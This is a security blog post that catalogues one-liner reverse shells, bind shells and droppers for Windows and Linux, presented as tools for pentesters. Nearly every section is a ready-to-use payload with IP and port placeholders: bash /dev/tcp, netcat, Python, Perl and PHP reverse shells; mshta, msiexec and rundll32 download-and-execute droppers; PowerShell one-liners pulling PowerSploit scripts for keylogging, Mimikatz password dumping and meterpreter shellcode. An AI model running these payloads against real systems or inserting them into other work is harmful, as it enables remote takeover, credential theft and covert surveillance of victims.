Monday, 30 July 2018

ONE LINER SHELL

ONE LINER SHELL

One Liner Shell, Draws attention to the different types of shell and droppers which plays a most important role during penetration testing. These one-liners can be used for gaining access to the system. These scripts will be used by red teamers during their pentest.Shells are described as a small piece of code or program which is used to gain a command execution on a specific device. There are two types of shells,
  1. Reverse Shell
  2. Bind Shell

REVERSE SHELL

Reverse shell is a type of shell in which the victim machine connect back to the attacker machine. The attacker machine runs a listener on a specific port on which it receives the connection by performing command or code execution.

BIND SHELL

Bind shell is a type of shell in which the attacker creates a communication port or a listener on the victim machine and waits for the attacker to connect.
I was impressed by a tool, so I have decided to write this blog. Tool link: https://github.com/D4Vinci/One-Lin3r. To use these shell in your real-time scenario, you need to fill up the IP address and the port number.
We will be discussing the reverse shell and dropper for windows and Linux platforms.
  1. WINDOWS PAYLOADS
    1. Microsoft's SyncAppvPublishingServer
    2. WinInstaller_dropper
    3. Win_Remote_Management
    4. Execute C# files
    5. mshta hta
    6. netcat bind shell
    7. netcat reverse shell
    8. rundll32 dropper
    9. escalate services
    10. Key logger
    11. meterpreter shell
    12. mimikatz passwds
    13. Socket reverse
  2.  LINUX PAYLOADS
    1. bash reverse
    2. netcat bind
    3. piped reverse
    4. netcat reverse
    5. sockets reverse perl
    6. socket reverse php

1      WINDOWS PAYLOADS

            Here are some of following commands for shell in Windows platforms. We need to focus on the payload part and if you are willing to edit the payload, go for it.

MICROSOFT’S SYNCAPPVPUBLISHINGSERVER

The Sync-AppvPublishingServer cmdlet initiates the Microsoft Application Virtualization (App-V) publishing refresh operation in the context of the current user. The publishing refresh connects to all added servers on  the client and exposes new App-V packages and their respective extension points to the user. Using Microsoft’s SyncAppvPublishingServer to download and execute a PowerShell file.
Type = Dropper
Payload = SyncAppvPublishingServer.exe "n;((New-ObjectNet.WebClient).DownloadString('{mention the url of the payload}') | IEX

WININSTALLER_DROPPER

Windows Installer is a software component and application programming interface (API) of Microsoft Windows used for the installation, maintenance, and removal of software. Passing msi file URL to the Windows installer will download and execute the payload.
type = Dropper
Payload = msiexec /i {mention the msi file URL here}

WIN_REMOTE_MANAGEMENT

Windows Remote Management (WinRM) is a feature of Windows Vista that allows administrators to remotely run management scripts. Windows Remote Management provides the ability to remotely execute wmi commands
type = execute
Payload = winrm qc -q & winrm i c wmicimv2/Win32_Process @{CommandLine="{your_command_here}"}
Execute C# files
Using the .NET compiler to compile a c# payload locally that can then be executed.
Type = Execute

Payload = C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /out:payload.exe {your_cs_file_here}

MSHTA HTA

Mshta.exe is a utility that executes Microsoft HTML Applications (HTA). Uses mshta command to download and execute your hta file.
Type = Dropper

Payload = mshta {your hta file url}

NETCAT BIND SHELL

Netcat (often abbreviated to nc) is a computer networking utility for reading from and writing to network connections using TCP or UDP. Uses netcat tool to setup a bind shell
Type = bind shell

Payload = nc -nv 4444 -e cmd.exe

NETCAT REVERSE SHELL

Netcat (often abbreviated to nc) is a computer networking utility for reading from and writing to network connections using TCP or UDPUses netcat tool to establish a reverse shell
Type = reverse 
Payload = nc -nv {ip} {port} -e cmd.exe
rundll32 dropper
The rundll32.exe process is responsible for running DLLs and placing its libraries in the memory. Using rundll32.exe to download and execute a PowerShell file.
Type = Dropper
Payload = rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('{your}');"
Escalate services
This is a power shell script which is used from power tools which are written by power Shell Empire. This script is used for escalation processes, so this script will search for vulnerable service privilege opportunities using the script from Power Tools
Type = escalation
Payload = Powershell.exe -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks

KEY LOGGER

Here a power shell script is been used to retrieve keystrokes. Using a script from powersploit to log keyboard strokes to C:\Users\Public\key.log
Type = Local
 Payload = Powershell.exe -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1');Get-Keystrokes -LogPath C:\Users\Public\key.log

METERPRETER SHELL

Metasploit meterpreter reverse HTTPS shell using a PowerShell script from powersploit
Type = Reverse
Payload = Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost {ip} -Lport {port} -Force

MIMIKATZ PASSWORDS

Grabbing passwords from memory using Invoke-mimikatz script from PowerSploit
Payload = Powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz

SOCKET REVERSE

Python socket to connect back & execute data with sub process.
Type = reverse

Payload = python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{ip}",{port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call("cmd");'

LINUX PAYLOADS

Bash reverse
Interactive shell via bash’s builtin /dev/TCP.
Type = Reverse
Payload = bash -i >& /dev/tcp/{ip}/{port} 0>&1

NETCAT BIND

Netcat (often abbreviated to nc) is a computer networking utility for reading from and writing to network connections using TCP or UDP. Uses netcat tool to setup a bind shell
Type = bind
Payload = nc -lvp 4444 -e /bin/sh

NETCAT REVERSE

Netcat (often abbreviated to nc) is a computer networking utility for reading from and writing to network connections using TCP or UDP. Establish a reverse connection with netcat.
Type = Reverse
Payload = nc -e /bin/sh {ip} {port}

PIPED REVERSE

Uses a tool exists on most of the systems and the output of the commands will be piped back.
Type = Reverse
Payload = exec 5<>/dev/tcp/{ip}/{port} && cat <&5 | while read line; do $line 2>&5 >&5; done

SOCKETS REVERSE PERL

Uses Perl sockets & the output of your commands will be piped back.
Type = reverse

Payload = perl -e 'use Socket;$i="{ip}";$p={port};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

SOCKET REVERSE PHP

Uses PHP sockets & exec to create a reverse shell.
Type = reverse
Payload = php -r '$sock=fsockopen("{ip}",{port});exec("/bin/sh -i <&3 >&3 2>&3");'

CONCLUSION

In today’s world, the shell is becoming very famous, interesting and  increasing in numbers. Mostly attackers preferred to hack or compromise a system using shell only because they are very flexible regarding modifying the code. Major Cyber-attacks are performed using the reverse shell. So users need to be very careful while handling any tools or files. Before executing a tool or a file try to scan the file for any malware detection (you can use some online scanners such as https://www.virustotal.com/#/home/upload or https://nodistribute.com/ ).
Be prepared and be safe

AUTHOR

Venkatesh C.S
Security Engineer
Briskinfosec Technology and Consulting PVT LTD
Find  me @ https://www.linkedin.com/in/venkatesh-c-s-44174711b/